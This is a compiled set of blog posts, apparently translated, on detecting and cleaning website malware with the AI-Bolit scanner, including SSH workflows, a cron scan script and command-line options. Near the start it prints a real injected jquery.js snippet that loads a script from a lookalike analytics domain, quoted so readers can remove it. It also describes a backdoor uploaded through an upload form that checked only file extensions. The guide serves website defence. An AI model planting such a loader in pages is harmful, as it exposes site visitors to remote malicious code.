AI-Bolit is an effective scanner for viruses and other malicious code on hosting. How to work with the AI-BOLIT scanner from the command line, and what this script can do


Today I was asked to help clean an online store of viruses. Unexpectedly, one of the employees had received a refusal to advertise in Google AdWords. The letter stated that suspicious code had been inserted into the file jquery.js.

First, I opened this file in a browser; Avast antivirus did not react to it at all, although I could already see the malicious code. I then connected via FTP using FileZilla and tried to open the file in Notepad++, and this time my antivirus blocked access to it.

To clean the virus out of the js file, I had to disable Avast for 10 minutes and then remove the malicious lines from the file.

If you encounter a similar problem, remove the following code, as shown in the picture, or these lines:

var r=document.referrer; var c=document.cookie; r1=0;
if ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf("mail")>0)) { document.cookie = "__ga1=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;"; r1=1; } else { if (c.indexOf("__ga1")==-1) { document.cookie = "__ga2=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;"; } }
if (((c.indexOf("__ga1")>-1) || (r1==1)) && (c.indexOf("__ga2")==-1)) { document.write(unescape("%3Cscript src='http://google-analyzing .com/urchin.js' type='text/javascript'%3E%3C/script%3E")); }

Site backup.

Next, we connect via SSH, for example using the PuTTY utility, and, if possible, make an archive of the site. To do this, just run the following command in the console:

tar -cf backup.tar /home/login/site/public_html

where /home/login/site/public_html is the full path to the main directory of the site

You don't have to back up the site, but what if you then delete something important?

There are now two options for checking a website for viruses:

1. Check the site using the PHP script Ai-Bolit, which searches for various viruses as well as PHP shells.

2. Download the entire site to your computer and scan it with Avast antivirus. The first option is much better, more convenient, and of much higher quality.

Cleaning a site on your local computer

I used the second method first, so I'll describe that one. After all the files (or the archive) were downloaded to the computer, and there were quite a few of them, about 25,000, I opened Avast and pointed it at the folder with the site files to scan them for malicious scripts.

After Avast performed a scan, two script viruses were detected in the website files folder:

  • Php-Shell-Jv
  • Js-Redirector-Fc

The index.php file consisted of the following code:

The javascript file "ui.datepicker_old.js" had malicious code at the very bottom of the script content. This code must be removed!

Cleaning a website from viruses using Ai-Bolit.

Ftp method.

1. Download the archive with the Aibolit script to your local computer and unpack it.

2. Connect via ftp using the FileZilla client

3. Place the unpacked archive files in the main directory of the site /home/your site/public_html

4. Run the script http://your domain/ai-bolit.php

5. The report file will be created in the main directory with the name AI-BOLIT-REPORT.html

If after running the script it displays a blank white screen, this means that the PHP version on the hosting server is not suitable for Aibolit.

Attention! If you need to check all the sites in a directory, upload the script to the /home/domains/ or /home/ folder; Ai-Bolit will then recursively go through all the folders and produce a report, but it seems to me that it is better to check one domain at a time.

Console option (SSH)

1. Launch the PuTTY program, or another console program.

2. Connect to the server using the host and password.

3. Go to the main directory of the site with the command cd /home/your login/your website/public_html/

4. Load the script with the command wget http://www..zip

5. Unpack the zip archive with the command unzip 20160904_112415ai-bolit.zip

6. Run the script php ai-bolit.php

To run it in the background, use the command: screen -d -m php ai-bolit.php

7. Wait for the script to perform the check and create a report named AI-BOLIT-REPORT.html on the server.

Please also note that if the PHP installed on your server is below 5.3, Aibolit will show an error and will not start scanning. In my case, I had to download the site and check it on my own server.

After the report file is created on the server, you can download it to your computer and view it with a regular browser (Chrome, Firefox, etc.).

First of all, you should pay attention to the report on “Malicious scripts”, and then either carefully delete these files or clean them manually, as I do.

I was looking on the Internet for a free "paid" theme for the site. Fortunately, there are enough such sites. True, they copy each other =) From experience with such templates, I knew that sometimes you have to pay in full for such freebies, because not-so-good people insert all sorts of nasty things into such templates that can cause very big trouble for decent programmers. I remember that my ESET antivirus used to find base64 and curse at it. Now it doesn't swear at it either. What I mean is that checking with an antivirus will not help.

Before Ai-Bolit, I checked files with Total Commander for the presence of certain words and, depending on what I found, checked and corrected them. But this is a very tedious task, and I set out to find a more optimal and faster search solution. And it was found: AI-Bolit, a unique free script for searching for viruses, Trojans, backdoors, and hacker activity on hosting.

And so, what this script can do:

  • look for viruses and all sorts of malicious and hacker scripts on the hosting: shells based on signatures, shells based on simple heuristics, everything that ordinary antiviruses are simply not able to find.
  • work with all the most popular CMS without exception, including Joomla, WordPress, Drupal, Bitrix...
  • look for redirects in .htaccess to malicious sites
  • look for sape/trustlink/linkfeed code in .php files
  • detect doorways
  • show directories open for writing
  • look for invisible links in templates

Why is this script needed?

An experienced hacker can hack almost any website. And your website may be no exception. What is the danger of website hacking? After gaining access to the site, an attacker can do the following:

  • "drain" your traffic to their own projects
  • download the contents of the server and database for sale to third parties
  • replace contact or payment information on the site
  • download users' personal data
  • place doorways with spam links on your website
  • plant viruses, Trojans or exploits on website pages, infecting visitors
  • send spam from your server
  • sell access to the hacked site to other attackers for subsequent unauthorized penetration
  • and so on... It's sad. Yes?

Ai-Bolit allows you to promptly detect a lot of malware and suspicious changes on your hosting, reducing the risk of being banned by search engines for spreading viruses and hosting doorways. It also lets you promptly learn about possible information leaks and other troubles concerning your site. COOL!!!

How to use the script

The script archive contains VERY clear instructions. By default, the "doctor" scans in normal mode with a minimum number of signatures and a minimum number of false positives.

There are two scanning options. Both are described in the instructions. I will give only the first, simplified one.

Launch option from browser (not recommended as it only performs express scanning)

  • Download the archive with the script (see attached files)
  • Unpack the .zip
  • Change the password in the line define("PASS", "put_any_strong_password_here_8_symbols_min");
  • Enable "expert" mode in the line define("AI_EXPERT", 0); // replace 0 with 1
  • copy the files from the /ai-bolit/ folder to the root directory on the server
  • copy the files from the known_files folder that correspond to your CMS
  • open http://sitename.com/ai-bolit.php?p=My456Pass123 in your browser and wait for the report
  • !!!after viewing the report, delete the Aibolit files and the script itself from the site!!!

That's all. Then, a report will appear in front of you and all you have to do is follow the errors and fix vulnerabilities.

Feedback

The author is a very friendly person. Always answers. If you have any suggestions or questions, please write to:
web: http://www.revisium.com/ai/
e-mail: [email protected]
skype: greg_zemskov

There is a problematic situation - a site with viruses.

Now I will show how this virus can be easily found and destroyed. The first thing you need to do is download the site to your local machine; it's much easier to check an array of files there.

This text is from the video description, so it is a little chaotic and dull. Though the same goes for the rest of my writings)

We'll download the site with FileZilla. I'll download it straight into my installed local server, Open Server, so that I can run it locally if that turns out to be needed.

If you have an antivirus installed that scans files on the fly, there is a chance that you will find viruses in some files even during downloading. Look in the logs of my antivirus.

In my case, my Microsoft Security did not show anything - the virus was unknown to it.

To search, I will use a special antivirus, Aibolit. Developer website: http://revisium.com/ai/
I advise you to go there and watch the seminar. The files are still downloading; it will take a long time. I already have a local copy ready, I was playing with this antivirus yesterday.

So, for this job we also need PHP for Windows. Download the latest version for Windows as a zip archive from http://windows.php.net/download/ and unpack it somewhere convenient.

OK. The preparations are over. Now to work.

Download the archive with iBolit.

There are three folders inside:

  • ai-bolit is the actual core of the antivirus
  • known_files – versions of anti-virus file databases for different engines
  • tools – auxiliary utilities.

So, let's start treating the site for viruses.

  1. Copy all files from the ai-bolit folder to the root of the site
  2. If we know what engine we have, we select the folder for our CMS in the known_files folder and put all its files in the root. In my case the engine is WordPress, so we will treat viruses with the antivirus databases for WordPress. If you want to check everything, you can put in the antivirus databases from all engines; maybe it will find something more)
  3. I forgot again: you need to enable the expert operating mode in the iBolit settings. To do this, open the file ai-bolit.php in a text editor, find the line define('AI_EXPERT', 0); and change "0" to "1"; that's it, expert mode is turned on.
  4. Now we need to unpack our zip archive with PHP into some folder where it is convenient to work with it. We need one file: php.exe
  5. Now we need to run the executable file of our antivirus. To do this, double-click on ai-bolit.php. I already have a choice of how to run this script.

I would advise keeping only the uploads folder and your theme folder. All plugins can be downloaded again, and the settings will remain in the database; viruses will not touch them. Check all the files of the theme manually; fortunately there are not many of them, unless the site was laid out by a clumsy layout designer. And re-upload everything else in the engine from a fresh copy. This is the most reliable way.

And I also remind you that most likely you have viruses throughout your entire hosting account (they very rarely manage to jump between the accounts of different users, only if the hosting administrator has set things up badly.)

If for some reason iBolit is removed from the site, you can always download the antivirus for the site from me

Viruses are sad(

PS: two articles on how to clean already found viruses:

  • Simpler - How to remove a virus from a website yourself for free
  • For advanced -

Probably everyone who creates websites encounters viruses and Trojans on a site. The first problem is to notice the problem in time, before the projects get penalized by search engines or become a burden to the hoster (used for DDoS, spam).

This article is being written in hot pursuit: during a routine backup of the site's source code to a machine running Windows, ESET Smart Security suddenly began complaining about the site's images, which it considered to be a virus. It turned out that the FilesMan backdoor had been uploaded to the site disguised as pictures.

The hole was that the script which let users upload pictures to the site checked only the file extension of the upload. The content was not checked at all. Don't do that ;) As a result, any PHP file could be uploaded to the site under the guise of an image. But we're not talking about holes here...

The point is that the task arose of daily checking all site files for viruses and Trojans.

Checking a website for viruses online

Online checks of a website for viruses are not suitable for this purpose at all. Online scanners behave like a search engine robot, sequentially going through all the available pages of the site; the transition to the next page happens via links from other pages. Accordingly, if an attacker uploaded a backdoor to your site disguised as a picture, there is no link to this picture anywhere on the site's pages, and the attacker did not deface the site or plant a virus on its pages, then an online check will simply never reach this picture and will not find the virus.

Why, you ask, would an attacker do this? Why upload a backdoor and do nothing? I'll answer: for spam, for DDoS, for other malicious activity that is not reflected in any way on the site's pages.

In a word, checking a website online for viruses is completely useless for complete peace of mind.

Plugin for checking a WordPress site for viruses and Trojans

There is an excellent antivirus plugin for WordPress. It's called . In my case, it found the FilesMan pictures perfectly and cleaned the site of viruses. But it has an important drawback: during the scan it puts a huge load on the server, because it simply goes through all the files sequentially. In addition, out of the box the check is only done manually; it is not possible to automate site checks with the plugin.

Besides, you can catch a virus on a site that isn't WordPress, so something universal is needed.

Checking site content with a regular antivirus

As mentioned above, the problems were discovered completely by accident by a regular desktop antivirus during a backup. Of course, you can download the entire site every day and scan it with a regular antivirus. All this is quite workable, but:

  • firstly, I want automation, so that the check runs automatically and produces a finished report;
  • secondly, there are sites that are simply not realistic to download every time.

Trying AI-Bolit

I've dragged out the introduction a bit. As a result of all the searching, a wonderful FREE antivirus for websites was found. This antivirus supports different usage schemes. I used it via SSH.

I haven’t figured out whether it can be used on shared hosting, but I think it’s possible. AI-Bolit is written in PHP and can be launched from a browser. Therefore, purely technically, it’s probably possible on a shared platform.

Important! Aibolit does not treat a website for viruses - it ONLY FINDS them and gives a report which files it considers dangerous. And you decide what to do with them yourself. Therefore, simply stupidly pressing a button and curing the site from Trojans will not work.

How to use AI-Bolit on VDS with ssh

Aibolit has instructions and master classes on using this antivirus. In general, the sequence is simple:

  • download
  • unpack on the server (I unpacked to /root/ai)
  • then from the SSH console run php /root/ai/ai-bolit/ai-bolit.php
  • the check may take hours, depending on the size of the site
  • based on the results of the check, a report file AI-BOLIT-REPORT-<date>-<time>.html will be generated

The report file will show problematic files, if any.

Heavy load on the server

The main problem you encounter when automatically checking a website for viruses is the load on the server. All antiviruses operate in the same way, sequentially going through all available files, and Aibolit seems to be no exception. It simply takes all the files and checks them one by one. The load jumps, and this can last a long time, which is not acceptable in production.

But Aibolit has a very useful feature (provided that you have a full-fledged server or VDS with root access). First you generate a list of files to check, and then feed this list to Aibolit. Aibolit will then simply run through this list.

To generate a list, you can use any server method. I ended up with this bash script:

# bash /root/ai/run.sh
# https://revisium.com/kb/ai-bolit-console-faq.html
DOMAIN="site"
AI_PATH="/root/ai"
# %H instead of %k: %k pads the hour with a space, which would split the unquoted report path
NOW=$(date +"%F-%H-%M-%S")
# you can make a public folder with password access
REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html"
SCAN_PATH="/home/azzrael/web/$DOMAIN/public_html/"
SCAN_DAYS=90
# Full scan of the whole directory (disabled in favour of the incremental list below)
#php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path="$SCAN_PATH" --report="$REPORT_PATH"
# Scan only files changed in the last SCAN_DAYS days
# AI-BOLIT-DOUBLECHECK.php is hardcoded by AIbolit at --with-2check !!!
find "$SCAN_PATH" -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php"
# Alternative lists: PHP-like files only, or PHP-like files plus .gif (the \( \) are needed, otherwise -o ties -ctime to *.gif only)
#find "$SCAN_PATH" -type f -name "*.ph*" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php"
#find "$SCAN_PATH" -type f \( -name "*.ph*" -o -name "*.gif" \) -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php"
php "$AI_PATH/ai-bolit/ai-bolit.php" --mode=1 --report="$REPORT_PATH" --with-2check
#history -c

Here you can see that with the find command we collect all the files changed during the last SCAN_DAYS days, save them to the list AI-BOLIT-DOUBLECHECK.php (by the way, at the time of writing it was impossible to rename the list file), and then feed this list to Aibolit. SCAN_DAYS can be as small as one day. If you put bash /root/ai/run.sh in the daily cron, the list of files to be scanned will not be very large. Accordingly, the check will not take much time and will not load the server heavily.

The greatest functionality is available when the AI-BOLIT scanner is started in command-line mode. This can be done under Windows/Unix/Mac OS X, as well as directly on the hosting, if you have SSH access and the hosting does not severely limit processor resource consumption.

Please note that to run the scanner, a console version of PHP 7.1 or higher is required. Earlier versions are not officially supported. Check the current version with the php -v command.

Help with AI-BOLIT scanner command line parameters

Show help

php ai-bolit.php --help

Skip files with certain extensions

php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

Scan only certain extensions

php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,suspected,tpl

Prepare a quarantine file for sending to security specialists. An archive AI-QUARANTINE-XXXX.zip with a password will be created.

php ai-bolit.php --quarantine

Run the scanner in “paranoid” mode (recommended to get the most detailed report)

php ai-bolit.php --mode=2

php ai-bolit.php --mode=1

Check one file "pms.db" for malicious code

php ai-bolit.php -jpms.db

Run the scanner with a memory size of 512Mb

php ai-bolit.php --memory=512M

Set the maximum scanned file size to 900Kb

php ai-bolit.php --size=900K

Pause 500ms between files when scanning (to reduce load)

php ai-bolit.php --delay=500

Send scan report by email [email protected]

php ai-bolit.php [email protected]

Create a report in the file /home/scanned/report_site1.html

php ai-bolit.php --report=/home/scanned/report_site1.html

Scan the /home/s/site1/public_html/ directory (the default report will be created there if the --report=report_file option is not specified)

php ai-bolit.php --path=/home/s/site1/public_html/

Execute the command when scanning is complete.

php ai-bolit.php --cmd="~/postprocess.sh"

Get a report in plain text with the name site1.txt

php ai-bolit.php -lsite1.txt

You can combine calls, for example,

php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,suspected

By combining the AI-BOLIT scanner call with other Unix commands, you can, for example, perform batch scanning of sites. Below is an example of checking several sites hosted within one account. If the sites are located inside the /var/www/user1/data/www directory, the command to launch the scanner will be

find /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path={} --mode=2 \;

By adding the --report parameter, you can control the directory in which scan reports will be generated.
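As an added example (not the scanner's or either author's own code) that ties the incremental run.sh idea above to the per-site find loop here: it rebuilds the changed-file list for each site under one account, skips sites where nothing changed, and writes a dated report per domain. It assumes the scanner is unpacked under AI_PATH (default /root/ai) and sites live at SITES_ROOT/<domain>/public_html; those two variables are assumptions, while the list name AI-BOLIT-DOUBLECHECK.php and the --with-2check, --mode, --delay, --path and --report options are the ones this page documents.

```shell
#!/bin/sh
# Cron-friendly incremental AI-Bolit wrapper for all sites in one account.
# Added example, not the scanner's own code. Assumes the scanner is unpacked
# under AI_PATH and every site lives at SITES_ROOT/<domain>/public_html.
# AI-BOLIT-DOUBLECHECK.php, --with-2check, --mode, --delay, --path and
# --report are the list name and options documented on this page.
AI_PATH="${AI_PATH:-/root/ai}"
SITES_ROOT="${SITES_ROOT:-/var/www/user1/data/www}"
SCAN_DAYS="${SCAN_DAYS:-1}"   # only files whose ctime is within this many days
DELAY_MS="${DELAY_MS:-500}"   # pause between files so the scan stays cheap

# Write every file under $1 changed within SCAN_DAYS to the list file $2
# and print how many were listed, so idle sites can be skipped.
build_changed_list() {
    find "$1" -type f -ctime "-$SCAN_DAYS" > "$2"
    wc -l < "$2" | tr -d ' '
}

# Compose (not run) the scanner command line. $1 is "full" (walk --path)
# or "changed" (scan only the AI-BOLIT-DOUBLECHECK.php list, so no --path,
# exactly like the active line of run.sh); $2 = site path; $3 = report file.
scan_command() {
    base="php $AI_PATH/ai-bolit/ai-bolit.php --mode=1 --delay=$DELAY_MS"
    case "$1" in
        full)    echo "$base --path=$2 --report=$3" ;;
        changed) echo "$base --report=$3 --with-2check" ;;
        *)       echo "scan_command: unknown mode '$1'" >&2; return 1 ;;
    esac
}

# Scan one domain: rebuild its changed-file list, skip it when nothing
# changed, otherwise run the scanner into a dated per-domain report.
scan_site() {
    domain="$1"
    site_path="$SITES_ROOT/$domain/public_html"
    list="$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php"
    report="$AI_PATH/reports/$domain-$(date +%F-%H-%M-%S).html"
    mkdir -p "$AI_PATH/reports"
    count=$(build_changed_list "$site_path" "$list")
    if [ "$count" -eq 0 ]; then
        echo "$domain: nothing changed in the last $SCAN_DAYS day(s), skipped"
        return 0
    fi
    cmd=$(scan_command changed "$site_path" "$report")
    echo "$domain: $count changed file(s): $cmd"
    eval "$cmd"
}

# run.sh --all        scans every directory under SITES_ROOT (one level,
#                     like the find -maxdepth 1 loop above)
# run.sh dom1 dom2 .. scans only the named domains; no arguments does nothing
case "${1:-}" in
    "")    ;;
    --all) for dir in "$SITES_ROOT"/*/; do
               [ -d "$dir" ] && scan_site "$(basename "$dir")"
           done ;;
    *)     for d in "$@"; do scan_site "$d"; done ;;
esac
```

Run it from cron once a day with --all; a site with no changed files costs only a find, and the --delay keeps the scanner from spiking the load on the sites that did change.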

php ai-bolit.php list of parameters... --eng

Switch the report interface to English. This parameter should come last.

Integration with other services and into the hosting panel

php ai-bolit.php --json_report=/path/file.json

Generate a report in json format

php ai-bolit.php --progress=/path/progress.json

Save the scan status to a file in JSON format. This file will contain structured data: the file currently being scanned, how many files have been scanned, how many files are left to scan, the scan percentage, and the time until scanning is completed. This mechanism can be used to show a progress bar and data about the files being scanned in the panel. Once the scan is complete, the file is deleted automatically.

php ai-bolit.php --handler=/path/handler.php

External event handler. You can add your own handlers for scan start, scan end, scan progress and scan errors. An example file can be found in the scanner archive at tools/handler.php. For example, after scanning is completed, you can do something with the report file (send it by mail, archive it, etc.).
